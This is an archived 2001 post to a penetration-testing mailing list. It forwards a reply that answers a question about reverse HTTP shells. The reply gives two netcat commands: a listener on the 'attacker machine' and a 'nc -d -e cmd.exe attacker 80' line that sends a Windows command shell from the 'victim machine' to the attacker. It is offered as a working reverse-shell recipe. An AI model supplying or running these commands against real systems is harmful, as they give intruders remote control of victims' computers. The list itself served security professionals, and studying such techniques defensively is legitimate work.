Fwd: Reverse Http Shell Solution
From: GrandmastrPlague@aol.comDate: 10/18/01
- Previous message: RT: "Re: 0-day exploit..do i hear $1000?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: GrandmastrPlague@aol.com Message-ID: <f3.10bfea67.290081a1@aol.com> Date: Thu, 18 Oct 2001 15:04:01 EDT Subject: Fwd: Reverse Http Shell Solution To: pen-test@securityfocus.com
attached mail follows:
From: GrandmastrPlague@aol.com Message-ID: <157.2a90306.29008113@aol.com> Date: Thu, 18 Oct 2001 15:01:39 EDT Subject: Re: Reverse Http Shell Solution To: vdalesandro@proteus.com.br
It seems like this question has been asked a million times before, but here
goes the same old answer again... use netcat
On attacker machine:
nc -l -p 80
On victim machine:
nc -d -e cmd.exe attacker 80
Make sure you set up the listening machine first.
Grandmaster Plague
----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
- Previous message: RT: "Re: 0-day exploit..do i hear $1000?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|